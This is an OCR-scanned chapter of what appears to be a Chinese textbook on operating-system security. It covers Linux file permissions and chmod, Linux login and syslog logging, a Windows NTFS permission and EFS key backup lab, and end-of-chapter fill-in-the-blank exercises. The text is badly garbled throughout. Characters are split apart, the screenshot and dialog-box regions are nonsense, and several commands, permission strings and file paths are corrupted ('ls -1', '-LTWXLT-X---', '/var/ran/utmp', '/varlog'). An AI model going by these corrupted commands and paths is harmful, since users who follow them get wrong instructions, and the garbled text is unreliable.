拥有 者 访问 权 
6-32 Linux 权限 位 


可 以 使 用 ls -1 命令 查看 当前 位 置 下 文件 和 目录 的 权限 。 比 如 : 


六 本 

-LTWXLT-X--- 1 david hackers 15 Feb 25 16:00 mbox 

“-rwxr-x---” 中 的 第 一 个 字符 “-” 表 示 mbox 文件 是 一 个 普通 文件 (与 目录 文件 相对 
应 ， 目 录 文 件 用 d 表示 )， 后 9 个 字符 是 mbox 文件 的 权限 位 ， 说 明 对 于 mbox 文件 ， 文 件 
的 拥有 者 david 具有 可 读 、 可 写 、 可 执行 权限 (rwx)， 用 户 组 hackers 具有 可 读 、 可 执行 权 
限 (r-x)， 其 他 用 户 什么 权限 都 没有 (---)。 

权限 位 还 可 以 用 一 个 八进制 数 来 表示 。 方 法 : 把 9 个 模式 位 分 为 3 组 ， 每 组 3 位 : 一 
位 为 拥有 者 ， 一 位 为 分 组 ， 一 位 为 其 他 用 户 。 然 后 加 上 如 表 6-12 所 示 的 数值 。 


表 6-12 八进制 权限 值 











例如 ， 为 一 个 文件 的 拥有 者 授予 可 读 和 可 写 权 限 ， 分 组 和 其 他 用 户 只 有 可 读 权限 ， 即 
权限 位 为 “rw -r--r--”。 它 可 以 写成 一 个 八进制 数 ， 即 把 表 中 的 数字 相 加 即 可 : 

Mode=owner(read)towner(write)+group(read)+others(read) 

Mode=400+200+40+4 

Mode=644 

3. chmod 命令 


用 户 可 以 使 用 chmod 命令 来 改变 文件 的 权限 设置 。 该 命令 有 两 个 变 元 : perm 是 为 文 
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件 设 置 的 权限 ; files 是 文件 的 名 字 。 如 果 要 同时 改变 目录 内 的 所 有 文件 和 子 目录 权限 ， 则 
应 该 加 -R 参数 。chmod 命令 只 能 由 文件 拥有 者 或 root 运行 。 

权限 变 元 可 以 指明 为 绝对 模式 或 符号 模式 。 

(1) 使 用 绝对 模式 ， 命 令 chmod 666 myfiles 把 my files 的 权限 设 为 rw-rw-rw-。 

(2) 符号 模式 说 起 来 稍微 有 些 复杂 ， 但 更 容易 理解 。 其 变 元 由 3 部 分 组 成 : who op 
permission， 其 中 who 是 一 个 用 户 (u)、 分 组 (g)、 其 他 (0) 或 者 所 有 (a 或 u g 0); p 是 十 、 一 
或 = 之 一 。 十 使 得 选择 的 权限 添加 到 文件 已 存 权限 中 ， 一 把 其 删除 ，= 使 文件 只 能 拥有 这 
些 权限 ; permission 是 可 读 (r)、 可 写 (w) 和 可 执行 (x) 的 任 一 组 合 。 如 果 who 被 去 掉 ， 则 假设 
是 “a”。 

如 果 要 给 文件 foo 的 分 组 以 读 权限 ， 则 使 用 如 下 命令 : 


$ chmod g+r foo 


与 权限 控制 相关 的 命令 还 有 chown( 改 变 拥有 权 )、chgrp( 改 变 分 组 ) 和 umask( 默 认 权限 
分 配 )， 在 此 不 作 介绍 。 


6.3.3 Linux 的 日 志 系统 


记录 重要 的 系统 事件 是 系统 安全 的 一 个 重要 因素 。Linux 维护 了 几 个 基本 的 日 志文 件 
来 跟踪 和 记录 系统 中 发 生 了 什么 事情 ， 包 括 谁 登录 进入 ， 谁 退出 登录 ， 以 及 他 们 做 了 些 什 
么 。 日 志文 件 对 于 维护 系统 安全 很 重要 。 它 们 为 两 个 重要 功能 提供 数据 : 审计 和 监测 ， 即 
通过 提供 一 个 历史 记录 (系统 中 关于 活动 的 审计 轨迹 ) 允 许 用 户 或 第 三 方 回头 来 系统 地 评价 
安全 程序 的 效率 ， 以 及 确定 引起 安全 破坏 或 系统 功能 失效 的 原因 。 如 果 需 要 ， 日 志文 件 还 
能 作为 提交 给 权威 机 构 的 证 据 。 它 们 还 能 用 来 “实时 ”地 监测 系统 状态 、 检 测 和 追踪 侵入 
者 、 发 现 bug 以 及 阻止 问题 发 生 。 

1. 日 志 子 系统 


在 Linux 系统 中 ， 有 3 个 主要 的 日 志 子 系统 。 

(1) 连接 时 间 日 志 : 由 多 个 程序 执行 ， 把 记录 写 入 到 /var/log/wtmp 和 /var/ran/utmp。 
login 等 程序 更 新 wtmp 和 utmp 文件 ， 使 系统 管理 员 能 够 跟踪 谁 在 何 时 登录 到 系统 。 

(2) 进程 统计 : 由 系统 内 核 执 行 。 当 一 个 进程 终止 时 ， 为 每 个 进程 向 进程 统计 文件 
(pacct 或 acct) 中 写 一 个 记录 。 进 程 统计 的 目的 是 为 系统 中 的 基本 服务 提供 命令 使 用 统计 。 

(3) 错误 日 志 : 由 syslogd 执行 。 各 种 系统 守护 进程 、 用 户 程序 和 内 核 通过 syslog 向 文 
件 /var/log/messages 报告 值得 注意 的 事件 。 另 外 有 许多 Linux 程序 创建 日 志 , 像 HITP 和 
FTP 这 样 提供 网 络 服务 的 服务 器 也 保留 详细 的 日 志 。 

多 数 Linux 系统 在 /varlog 中 保存 主要 的 日 志 。 常 用 的 日 志文 件 如 表 6-13 所 示 。 
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表 6-13 常用 的 Linux 日 志文 件 














日 志文 件 目标 

access-log 记录 HTTP/web 的 传输 
acct/pacct 记录 用 户 命令 
aculog 记录 调制 解 调 器 的 活动 
btmp 记录 失败 的 登录 
lastlog 记录 最 近 几 次 成 功 登录 的 时 间 和 最 后 一 次 不 成 功 的 登录 
messages 从 syslog 中 记录 信息 (通常 连接 到 syslog 文件 ) 
sudolog 记录 使 用 sudo 发 出 的 命令 
sulog 记录 su 命令 的 使 用 
syslog 从 syslog 中 记录 信息 (通常 连接 到 message 文 件 ) 
utmp 记录 当前 登录 的 每 个 用 户 
wtmp 一 个 用 户 每 次 登录 进入 和 退出 时 间 的 永久 记录 
xferlog 记录 FTP 会话 

2. 登录 记录 


utmp、wtmp 和 lastlog 日 志文 件 是 多 数 重要 Linux 日 志 子 系统 的 关键 一 一 保留 用 户 登 
录 进 入 和 退出 的 记录 。 有 关 当 前 登录 用 户 的 信息 记录 在 文件 utmp 中 ; 登录 进入 和 退出 记 
录 在 文件 wtmp 中 ; 最 后 一 次 登录 记录 在 文件 lastlog 中 。 数 据 交 换 、 关 机 和 重启 也 记录 在 
wtmp 文件 中 。 所 有 的 记录 都 包含 时 间 戳 。 

这 些 文件 (除了 lastlog) 在 具有 大 量 用 户 的 繁忙 系统 中 增长 得 很 迅速 。 例 如 wtmp 文件 可 
以 无 限制 增长 ， 除 非 定期 进行 截取 。 许 多 系统 以 一 天 或 一 周 为 单位 把 wtmp 配置 成 循环 使 
用 。 它 通常 由 cron 运行 的 脚本 来 删改 。 这 些 脚 本 重 命名 并 循环 使 用 wtmp 文件 ， 能 保留 一 
周 有 价 值 的 数据 。 通 常 ，wtmp 在 第 一 天 结束 后 重 命名 为 wtmp.1; 第 二 天 后 wtmp.1 变 为 
wtmp.2， 直 到 wtmp.7。 

如 果 /var/log/wtmp 文件 不 存在 ， 则 不 执行 登录 和 连接 时 间 统 计 。 它 必须 手工 进行 创建 
(使 用 touch/var/log/wtmp 命令 )。 

每 次 有 一 个 用 户 登 录 时 ，login 程序 在 文件 lastlog 中 查看 用 户 的 UID。 如 果 找 到 了 ， 
则 把 用 户 上 次 登录 、 退 出 时 间 和 主机 名 写 到 标准 输出 中 ， 然 后 login 程序 在 lastlog 中 记录 
新 的 登录 时 间 。 在 新 的 lastlog 记录 写 入 后 ，utmp 文件 打开 并 插入 用 户 的 utmp 记录 。 该 记 
录 一 直到 用 户 登录 退出 时 删除 。utmp 文件 可 以 被 各 种 命令 使 用 ， 包 括 who、w、users 和 
finger。 

下 一 步 ，login 程序 打开 wtmp 文件 附加 用 户 的 utmp 记录 。 当 用 户 登录 退出 时 ， 具 有 
更 新 时 间 戳 的 同一 utmp 记录 附加 到 文件 中 。wtmp 文件 被 程序 last 和 ac 命令 使 用 。 
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1) who 命令 


who 命令 查询 utmp 文件 并 报告 当前 每 个 登录 的 用 户 。who 的 默认 输出 包括 用 户 名 、 
终端 类 型 、 登 录 日 期 和 时 间 以 及 远程 主机 。 该 命令 的 执行 结果 示意 如 下 : 


$ who 
root ttyl May 15 16:09 
bob console May 15 14:49 


alice ttyp2 May 16 00:13 
carol ttyp3 May 11 13:20 
如 果 指 明了 wtmp 文件 名 ， 则 who 命令 查询 所 有 以 前 的 登录 。 命 令 who/var/log/wtmp 
将 报告 自从 wtmp 文件 创建 或 删改 以 来 的 每 一 次 登录 。 
2) w 命令 
Ww 命令 查询 utmp 文件 并 显示 当前 系统 中 每 个 用 户 和 他 所 运行 的 进程 信息 。 标 题 栏 显 
示 当 前 时 间 、 系 统 已 运行 了 多 长 时 间 、 当 前 有 多 少 用 户 登录 以 及 过 去 1 分 钟 、5 分 钟 和 15 
分 钟 内 的 系统 平均 负载 。 该 命令 的 执行 结果 示意 如 下 : 


Sw 


3:55pm up 8 days, 2:40, 5 users, load average: 0.04, 0.06, 0.09 
User tty 1ogin@ idle  JCPU PCPU what 
carol pts/tl 2:16pm 18:09 -sh 

dave pts/t2 2:20pm 88:42 1 1 -sh 
trent pts/t3 1:07pm 8:18 nslookup 
mallory pts/t4 10:07pm 133:55 -sh 
alice pts/t5 1:50pm 1 1 W 


3) users 命令 

users 命令 用 单独 一 行 打印 出 当前 登录 的 用 户 ， 每 个 显示 的 用 户 名 对 应 一 个 登录 会 话 。 
如 果 一 个 用 户 有 不 止 一 个 登录 会 话 ， 那 他 的 用 户 名 将 显示 相同 的 次 数 。 

$ users 

alice carol dave bob 

4) last 命令 

last 命令 往 回 搜索 wtmp 来 显示 自从 文件 第 一 次 创建 后 登录 过 的 用 户 。 它 还 报告 终端 类 
型 和 日 期 。 输 出 可 能 很 元 长 ， 下 面 是 一 个 简短 的 例子 : 


$ last 

alice ttyp4 Thu May 7 19:50 still logged in 
ftp ftp Thu May 7 18:42 - 18:42 (00:00) 
caro] ttyp5 Thu May 7 18:37 stil] logged in 
alice ftp Thu May 7 15:50 - 16:06 (00:15) 
bob ttyp4 Thu May 7 15:46 - 15:50 (00:03) 
dave ftp Thu May 7 15:00 - 15:01 (00:01) 


如 果 指 明了 用 户 ， 那 么 last 只 报告 该 用 户 的 近期 活动 。 示 意 如 下 : 
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$ last carol 


carol pts/t6 Tue Apr 20 21:57 still logged in 
carol pts/t4 Tue Apr 20 21:16 still logged in 
carol pts/t5 Tue Apr 20 18:03 sti11 logged in 
carol pts/t0 Mon Apr 19 15:17 - 15:26 (1+00:09) 
caro] pts/t0 Fri Apr 16 16:44 - 18:25 (01:41) 
carol pts/t0 Fri Apr 16 14:12 - 16:12 (02:00) 
carol pts/t0 Thu Apr 15 11;05 - 18:33 (07:28) 
carol pts/t0 Wed Apr 14 22:16 - 01:52 (03:35) 
carol pts/t4 Tue Apr 13 22:07 - 21:15 (6+23:08) 
carol pts/t3 Tue Apr 13 13:03 - 17:30 (1+04:26) 


5) ac 命令 
ac 命令 根据 当前 /var/log/wtmp 文件 中 的 登录 进入 和 退出 来 报告 用 户 连 接 的 时 间 ( 小 
时 )。 如 果 不 使 用 标志 ， 则 报告 总 的 时 间 。 该 命令 的 执行 结果 示意 如 下 。 


$ac 
total 136.25 


“-d” 标 志 产 生 每 天 的 总 的 连接 时 间 。 示 意 如 下 : 


$ ac -d 


Mar 15 total 19.89 
Mar 16 total 4.52 
Mar 17 total 17.35 
Mar 18 total 29.26 
Mar 19 total 36.28 
Mar 20 total 11.42 
Mar 21 total 17.53 


“-p” 标 志 报 告 每 个 用 户 的 总 的 连接 时 间 。 示 意 如 下 : 


$ ac -p 

mallory 31.02 
carol 41.08 
root 10.30 
eve 29.11 
alice 14.73 
bob . 10.01 
total 136.26 


3. 进程 统计 

Linux 的 进程 统计 可 以 跟踪 每 个 用 户 运行 的 每 条 命令 ， 用 以 了 解 用 户 的 历史 操作 或 跟 
踪 入 侵 者 。 进 程 统计 默认 不 激活 ， 需 要 启动 。 在 Linux 系统 中 ， 启 动 进程 统计 使 用 accton 
命令 ， 并 且 必 须 以 root 身份 来 运行 。 使 用 的 命令 格式 如 下 : 

accton /var/log/pact 

一 旦 accton 被 激活 ， 就 可 以 使 用 lastcomm 命令 监测 系统 中 任何 时 候 执行 的 命令 。 若 


要 关闭 统计 ， 可 不 带 任何 参数 来 运行 accton 命令 。 
lastcomm 命令 报告 以 前 执行 的 命令 。 不 带 变 元 时 ，lastcomm 命令 显示 当前 统计 文件 生 
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命 周 期 内 记录 的 所 有 命令 的 有 关 信 息 ， 包 括 命 令 名 、 用 户 、tty、 命 令 花 费 的 CPU 时 间 和 
一 个 时 间 惟 。 该 命令 的 执行 结果 示意 如 下 : 


# lastcomm 

w S dave ttyp2 0.00 secs Tue Apr 20 19:22 
1s dave ttyp2 0.00 secs Tue Apr 20 19:22 
1s dave ttyp2 0.00 secs Tue Apr 20 19:22 
csh F dave ttyp2 0.00 secs Tue Apr 20 19:21 
1ast dave ttyp2 0.00 secs Tue Apr 20 19:21 
comsat root 0.00 secs Tue Apr 20 19:14 
ac root ttypl 0:;00 secs Tue Apr 20 19:17 
sa root ttypl 0.00 secs Tue Apr 20 19:17 
man root ttypl 0.00 secs Tue Apr 20 19:16 
sh root ttypl 0.00 secs Tue Apr 20 19:16 
more root ttypl 0.00 secs Tue Apr 20 19:16 
uuxqt uucp ?7 0.00 secs Tue Apr 20 19:17 
uucico uucp ?27 0, 中 secs Tue Apr 20 19:15 
Sa root ttypl 0.00 secs Tue Apr 20 19:16 
Users dave ttyp2 0. 0 secs Tue Apr 20 19:16 
w 5 dave ttyp2 0. Dn secs Tue Apr 20 19:15 
Who dave ttyp2 0.00 secs Tue Apr 20 19:15 
sendmail F list i 0. 的 secs Tue Apr 20 19:15 
procmail S dave 0.00 secs Tue Apr 20 19;15 
UUX Ss list a 0.00 secs Tue Apr 20 19:15 
procmail F list 二 0.00 secs Tue Apr 20 19:15 
sendmail F list PR 0.00 secs Tue Apr 20 19:15 
sh list ss 0.00 secs Tue Apr 20 19:15 
sendmail S list i 0.00 secs Tue Apr 20 19:15 
sh 1ist es 0.00 secs Tue Apr 20 19:15 


4. syslog 设备 


系统 在 同一 时 间 会 发 生 许多 事情 ，Linux 系统 集成 了 syslog 设备 ， 用 以 对 各 种 设备 (发 
布 消息 的 子 系统 ) 进 行事 件 记 录 ， 实 现 日 志 整合 。syslog 可 以 记录 系统 事件 ， 可 以 写 到 一 个 
文件 或 设备 中 ， 或 给 用 户 发 送 一 个 信息 。syslog 除了 能 记录 本 地 事件 之 外 ， 还 能 通过 网 络 
记录 另 一 个 主机 上 的 事件 。 

syslog 设备 由 一 个 守护 进程 (/etc/syslogd) 组 成 ， 它 能 接收 访问 系统 的 日 志 信息 ， 并 且 根 
据 /etc/syslog.conf 配置 文件 中 的 syslog 记录 来 处 理 这 些 信息 。 一 个 典型 的 syslog 记录 包括 
生成 程序 的 名 字 和 一 个 文本 信息 。 它 还 包括 一 个 设备 (信息 来 源 ) 和 一 个 范围 从 info( 信 息 ) 到 
emerg( 紧 急 ) 的 优先 级 。 

每 个 syslog 消息 被 赋予 下 面 的 一 介 主 要 设备 。 


LOG AUTH: 认证 系统 login、su、getty 等 。 

LOG _AUTHPRIV: 同 LOG_AUTH, 但 只 登录 到 所 选择 的 单个 用 户 可 读 的 文 
件 中 。 

LOG_CRON: cron 守护 进程 。 

LOG_DAEMON: 其 他 系统 守护 进程 ， 如 routed。 

LOG FTP: 文件 传输 协议 ftpd、tftpd。 

LOG KERN: 内 核 产生 的 消息 。 

LOG LPR: 系统 打印 机 缓冲 池 lpr、lpd。 

LOG _ MAIL: 电子 邮件 系统 。 

LOG NEWS: 网 络 新 闻 系统 。 
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LOG SYSLOG: 由 syslogd 产生 的 内 部 消息 。 
LOG USER: 随机 用 户 进 程 产生 的 消息 。 
LOG UUCP: UUCP 子 系统 。 
LOG LOCAL0-LOG LOCAL7: 为 本 地 使 用 保留 。 
syslog 为 每 个 事件 赋予 几 个 不 同 的 优先 级 。 
@ LOG EMERG: 紧急 情况 。 
LOG ALERT: 应 该 被 立即 改正 的 问题 ， 如 系统 数据 库 被 破坏 。 
LOG _CRIT: 重要 情况 ， 如 硬盘 错误 。 
LOG ERR: 错误 。 
LOG WARNING: 警告 信息 。 
LOG NOTICE: 不 是 错误 情况 ， 但 是 可 能 需要 处 理 。 
LOG INFO: 情报 信息 。 
LOG DEBUG: 包含 情报 的 信息 ， 通 常 只 在 调试 一 个 程序 时 使 用 。 

syslog.conf 文件 指明 syslogd 程序 记录 日 志 的 行为 ， 该 程序 在 启动 时 查询 配置 文件 。 
syslog.conf 文件 由 不 同 程序 或 消息 分 类 的 单个 条 目 组 成 ， 每 个 占 一 行 。 对 每 类 消息 提供 一 
个 选择 域 和 一 个 动作 域 ， 由 Tab 符 隔 开 : 选择 域 指明 消息 的 类 型 和 优先 级 ， 动 作 域 指明 
syslogd 接收 到 一 个 与 选择 标准 相 匹 配 的 消息 时 所 执行 的 动作 。 每 个 选项 是 由 设备 和 优先 级 
组 成 的 。 当 指明 一 个 优先 级 时 ，syslogd 将 记录 一 个 拥有 相同 或 更 高 优先 级 的 消息 。 所 以 如 
果 指 明 crit， 那 所 有 标 为 crit、alert 和 emerg 的 消息 将 被 记录 。 每 行 的 行动 域 指明 当选 择 域 
选择 了 一 个 给 定 消息 后 应 该 把 它 发 送 到 哪儿 。 例 如 ， 如 果 想 把 所 有 邮件 消息 记录 到 一 个 文 
件 中 ， 下 面 一 行 就 可 以 了 (“#” 指 明 是 注释 ): 

#Log all the mail messages in one place 

mail.* /var/log/maillog 

其 他 设备 也 有 自己 的 日 志 。UUCP 和 news 设备 能 产生 许多 外 部 消息 。 它 把 这 些 消息 
存 到 自己 的 日 志 (/var/log/spooler) 中 并 把 级 别 限 为 “err” 或 更 高 。 例 如 : 


# Save mail and news errors of level err and higher in aspecial file. 
uucp,news.crit /var/1og/spooler 


当 一 个 紧急 消息 到 来 时 ， 可 能 想 让 所 有 的 用 户 都 得 到 ， 也 可 能 想 让 自己 的 日 志 接收 并 
保存 : 


#Everybody gets emergency messages, plus log them on anther machine 
*.emerg * 
*.emerg Q@linux.com.cn 


alert 消息 应 该 写 到 root 和 tiger 的 个 人 账号 中 : 


#Root and Tiger get alert and higher messages 
*.alert root,tiger 


有 时 syslogd 将 产生 大 量 的 消息 。 例 如 ， 内 核 (kermel 设备 ) 可 能 很 元 长 。 用 户 可 能 想 把 
内 核 消息 记录 到 /dev/console 中 。 下 面 的 例子 表明 内 核 日 志 记录 被 注释 掉 了 : 
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#Log all kernel messages to the console 
#Logging much else clutters up the screen 
#kern.* /dev/console 


用 户 可 以 在 一 行 中 指明 所 有 的 设备 。 下 面 的 例子 把 info 或 更 高 级 别 的 消息 送 到 
/Var/log/messages， 除 了 mail 以 外 。 级 别 “none ”禁止 一 个 设备 : 
#Log anything (except mail)of level info or higher 


#Don't log private authentication messages! 
*.info;mail.none;authpriv.none /var/log/messages 


在 有 些 情况 下 ， 可 以 把 日 志 送 到 打印 机 ， 这 样 网 络 入 侵 者 怎么 修改 日 志 就 都 没有 用 
了 。 通 常 要 广泛 记录 日 志 。syslog 设备 是 一 个 攻击 者 的 显著 目标 。 一 个 为 其 他 主机 维护 日 
志 的 系统 对 于 防范 服务 器 攻击 特别 脆弱 ， 因 此 要 特别 注意 。 


6.4 ”小 型 案例 实 训 


NTFS 权限 设置 是 Windows 文件 系统 安全 的 基础 ， 而 EFS 则 被 认为 是 除 NTFS 之 外 的 
第 二 层 保护 。 当 要 访问 一 个 已 被 EFS 加 密 的 文件 时 ， 用 户 必 须 同时 拥有 访问 该 文件 的 
NTFS 权限 和 解密 密 钥 。 本 实验 主要 通过 NTFS 权限 设置 和 EFS 密 钥 备 份 来 增强 读者 保护 
Windows 文件 系统 安全 的 技能 。 


6.4.1 NTFS 权限 设置 


(1) 以 Administrator 账户 登录 到 Windows XP 操作 系统 。 

(2) 打开 资源 管理 器 ， 在 一 个 NTFS 分 区 下 建立 新 文件 夹 ， 如 D:\test。 

(3) 右 击 test 文件 夹 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “test 属性 ”对 话 
框 ， 在 该 对 话 框 中 选择 “安全 ”选项 卡 ， 如 图 6-33 所 示 。 








添加 中 ) 














Adninistrator 的 权限 了) 





完全 控制 
修改 


读 职 和 运行 
列 出 文件 夹 目 录 
读 职 


允许 
口 
口 
口 
口 
口 
口 














图 6-33 “安全 ”选项 卡 
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(4) 在 “组 或 用 户 名 称 ” 列 表 框 中 ， 单 击 Users 组 ， 然 后 单 击 “ 删 除 ” 按 钮 ， 此 时 将 
出 现 如 图 6-34 所 示 的 消息 框 ， 提 示 不 能 删除 Users 组 ， 因 为 该 对 象 正在 从 它 的 父 文件 夹 那 
里 继承 权限 。 单 击 “ 确 定 ” 按 钮 关闭 该 消息 框 。 


i ‘Users (ADTH-DS4ABSADA\sers)” A ers ODT-DS4h854DAVsers)”， 才 必须 
因 六 昌黎 “Users (ADNTN-DSAA3S4DA\Users)” 


Cj 





图 6-34 ”安全 消息 框 


(5) 单 击 “ 高 级 ”按钮 ， 进 入 “test 的 高 级 安全 设置 ”对 话 框 ， 取 消 选中 “从 父 项 继承 
那些 可 以 应 用 到 子 对 象 的 权限 项 目 ， 包 括 那些 在 此 明确 定义 的 项 目 ” 复 选 框 ， 以 阻止 权限 
的 继承 ， 如 图 6-35 所 示 。 此 时 出 现 一 个 消息 框 ， 提 示 或 者 将 当前 继承 的 权限 复制 到 该 文件 
夹 ， 或 者 从 该 文件 夹 中 删除 除了 明确 指定 的 权限 之 外 的 所 有 权限 ， 如 图 6-36 所 示 。 

test 的 高 级 安全 设置 区 
[权限 ”| 审核 | 所 有 者 | 有效 权限 | 加 
要 想 查看 有 关 “ 特 殊 权 限 ”的 详细 信息 ， 请 选择 一 个 权限 项 目 ， 然 后 单 击 “ 编 辑 ” 


权限 项 目 @) 
继承 于 应 用 于 
该 文件 夹 ， 子 文件 ， 
站 和 
人 
该 文件 夹 ， 子 文件 . 
该 文件 夹 及 子 文件 夹 


CT 
加 以 冯 项 奴 承 那 下 可 以 应 用 到 子 对 昔 的 权限 项 目 ， 包 掺 那些 在 此 明确 定义 的 项 目 区 )。] 
回 用 在 此 显示 的 可 以 应 用 到 子 对 象 的 项 目 营 代 所 有 子 对 象 的 权限 项 目 E) 

















图 6-35 高 级 安全 设置 


站 村 
宛 这 必用 9 可 限 项 目 从 公 项 复 这 个 对 梨 ， 请 间 击 “ 复 


ee 


-要 取消 这 个 操作， 请 单 击 “取消 ” 





图 6-36 阻止 继承 消息 框 


(6) 单 击 “ 复 制 ”或 “删除 ”按钮 后 ， 回 到 “安全 ”选项 卡 ， 再 次 删除 Users 组 ， 删 除 
成 功 。 

(7) 在 “组 或 用 户 名 称 ”列表 框 中 ， 选 择 Administrators 组 ， 修 改 其 权限 ， 拒 绝 其 “ 读 
取 ” 权 限 ， 如 图 6-37 所 示 。 
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(8) 关闭 属性 对 话 框 ， 双 击 test 文件 夹 ， 将 出 现 拒绝 访问 的 错误 提示 ， 如 图 6-38 
所 示 。 


人 


| 富山 | 共享 安全 | 自 定义 


姐 或 用 户 名 称 G) 
@ Adninistrator (ADNIN-DS4ABS4DA\Adninistrator) 
Radinistrators (ADMIN-DS4ABS4DA\Adninistrators) 
RCREATOR orNER 
ststm 
RUsers HDMIN-DS4A854DA\Users) 


[ET | | 


) 
Administrators 的 权限 下 ) _ 





回 省 
口 图 吕 口 口 口 | 说 


无 法 访问 D: \test。 

















[WE | 
图 6-37 ”修改 权限 图 6-38 ”拒绝 访问 提示 


6.4.2 备份 EFS 密 角 


(1) 选择 “开始 ”一 “运行 ”菜单 命令 ， 在 “运行 ”对 话 框 中 输入 mmec 打开 控制 台 管 
理 器 ， 选 择 “ 文 件 ” 一 “添加 /删除 管理 单元 ”菜单 命令 ， 打 开 “ 添 加 /删除 管理 单元 ”对 
话 框 ， 如 图 6-39 所 示 。 

(2) 在 “添加 /删除 管理 单元 ”对 话 框 中 单 击 左下 角 的 “添加 ”按钮 ， 出 现 “ 添 加 独立 
管理 单元 ”对 话 框 ， 如 图 6-40 所 示 。 

滩 加 /删除 管理 单元 
[要 了 ”| 扩展 


使 用 此 页 来 添加 或 删除 控制 台 的 管理 单元 。 
管理 单元 于 加 到 | G) : [和食 | 








Microsoft Corpora. 
Microsoft Corpora. 


Microsoft Corpors. 
Microsoft Corpora. 


Microsoft Corpors, 
Microsoft Corpora.,. 


的 一 个 服务 的 或 一 台 计算 机 的 证 书 
存储 内 容 。 


添加 四 ). 出 险 臣 关于 记 


























图 6-39 添加 /删除 管理 单元 图 6-40 添加 独立 管理 单元 
/AN. 
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(3) 在 “添加 独立 管理 单元 ”对 话 框 中 选中 “证 书 ” 管 理 单元 ， 然 后 单 击 “ 添 加 ” 按 
钮 出现 “证 书 管理 单元 ”对 话 框 ， 如 图 6-41 所 示 。 








6-41 ”证书 管理 单元 


(4) 在 “证 书 管理 单元 ”对 话 框 中 ， 分 别 选 中 “我 的 用 户 账户 ”和 “计算 机 账户 ” 单 
选 按钮 ， 添 加 完成 后 的 效果 如 图 6-42 所 示 . 


添加 /删除 管理 单元 

[了 扩展 
使 用 此 页 来 壬 加 或 抽 险 控制 台 的 管理 单元 。 
管理 单元 添加 到 G) : | 合 控制 台 根 节点 


姜 证 书 - 当前 用 户 
站 证 书 号 地 计算 机 ) 











图 6-42 添加 账户 


(5) 再 次 打开 控制 台 ， 单 击 “ 证 书 一 当前 用 户 ” 一 “个 人 ”一 “证 书 ”节点 ， 可 以 看 
到 用 户 证 书 ， 如 图 6-43 所 示 。 

(6) 选中 用 户 证 书后 单 击 鼠 标 右键 ， 在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”一 “ 导 
出 ”命令 ， 进 行 证 书 的 备份 操作 ， 如 图 6-44 所 示 。 

(7) 在 打开 的 证 书 导出 向 导 中 ， 单 击 “ 下 一 步 ”按钮 ， 在 列表 框 中 选择 “是 ， 导 出 私 
钥 ” 选项 ， 继 续 单 击 “ 下 一 步 ”按钮 ， 在 出 现 的 密码 框 中 输入 密码 。 
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(8) 输入 密码 后 ， 继 续 单 击 “ 下 一 步 ”按钮 ， 在 文本 框 中 输入 文件 名 ， 单 击 “ 浏 览 ” 
按钮 设 定 文件 保存 路 径 。 再 次 单 击 “ 下 一 步 ”按钮 ， 便 完成 了 密 钥 的 导出 备份 ， 如 图 6-45 
所 示 。 














文件 四 换 作 Q) 查看 WD 收藏 天 Q) 窗口 m)。 帮助 中 


CEN ET ET 国 
和 控制 台 根 节点 \ 证 书 - 当前 用 户 \ 个 人 \ 证 书 
加 控制 台 根 节 点 6 
三 印证 书 - 当前 用 户 

日 多 个 








人 证书 
由 图 受信 任 的 根 证 书 颁 发 机 构 
由 国 企业 信任 
由 加 中 级 证 书 合 发 机 构 
由 国 Active Directory 用 户 对 
由 - 国 受信 任 的 发 行者 
由 国 不 信任 的 证 书 
让- 国 第 三 方 根 证 书 颁发 机 构 
由 国 受信 任 人 










< 
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文件 四 ， 换 作 他 查看 名 收 戈 天 Q) 钱 口 如 帮助 D 








ms ' 牙 2 


要 切 D 用 新 密 钥 申请 证 书 . 

复制 C) 用 相同 密 钥 中 请 证 书 

Mt) 用 新 外 续 订 证 节 
任 的 证 节 和 用 相同 密 银 续 订 证 节 





根 证书 颁 发 机 构 
帮助 0 





6-44 ”导出 证 书 


证 书 导出 向 导 
正在 完成 证 书 导出 向 导 


您 已 成 功 地 完成 证 书 导 出 向 导 。 


Ci\Docunents and Se 


个 人 信息 交换 (x. pfx) 








图 6-45 完成 导出 
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本 章 小 结 


本 章 在 对 操作 系统 安全 的 相关 知识 进行 概述 性 介绍 的 基础 上 ， 重 点 讲述 了 目前 市 场 占 
有 率 最 高 的 两 类 操作 系统 ， 即 Windows 和 Linux 系列 操作 系统 的 安全 技术 ， 重 点 是 账号 安 
全 和 文件 系统 安全 ， 并 通过 实验 及 案例 对 相关 技术 进行 了 讲解 。 


习 题 


一 、 填 空 题 


1. 操作 系统 安全 的 定义 包括 5 大 类 ， 分 别 为 ( )、( ).( )、( 小 
CN 

2. 按照 美国 国防 部 制定 的 可 信 计 算 机 安全 标准 (TCSEC)，Windows 7 操作 系统 属于 
( ”) 级 别 。 
Windows 安全 子 系统 的 组 件 包 括 ( )、( )( )( )( ). 
在 Windows 操作 系统 中 ， 用 来 保存 用 户 账号 和 口令 的 数据 库 被 称 为 (  )。 
Windows 文件 系统 的 类 型 包括 ( )、( )、( ). 
每 块 基本 磁盘 最 多 可 以 被 划分 为 (  ) 个 主 分 区 。 
NTEFS 分 区 自 带 的 文件 和 文件 夹 加 密 保护 功能 是 通过 ( ) 文 件 系统 实现 的 。 

8. 在 Windows 的 端口 分 类 中 ， 按 照 端 口号 ， 通 常 可 以 划分 为 ( 全 二 记 
( ”)3 类 。 在 命令 提示 符 下 查看 正在 使 用 端口 号 的 命令 是 (  )，FTP 协议 中 实现 FTP 控 
制 的 端口 号 是 ( 。 )。 

9. 在 Windows 系统 中 关闭 默认 共享 ， 可 以 通过 禁用 ( ”) 服 务 来 实现 。 

10. 要 新 建 一 个 IPSec 安全 策略 ， 一 般 需 要 ( ”) 和 ( ”) 两 个 步骤 。 

区 ) 是 Web 网 站 通过 浏览 器 存放 在 本 地 计算 机 上 的 一 个 记录 文件 ， 主 要 记录 用 
户 的 个 人 信息 。 

12. 在 Windows 7 等 操作 系统 中 制定 软件 限制 策略 的 规则 包括 ( js a 
( ”)、( ”)。 在 默认 情况 下 ， 软 件 可 以 运行 在 ( 。 ) 和 ( ”) 两 个 级 别 上 。 

13. 在 Windows 操作 系统 中 可 以 使 用 安全 模板 来 配置 系统 安全 性 ， 安 全 模板 文件 的 后 


汉人 


组 是 (  )。 
14. ( ”) 是 Windows 操作 系统 、 硬 件 配置 以 及 客户 应 用 程序 得 以 正常 运行 和 保存 配 
置 的 核心 “数据 库 ”。 


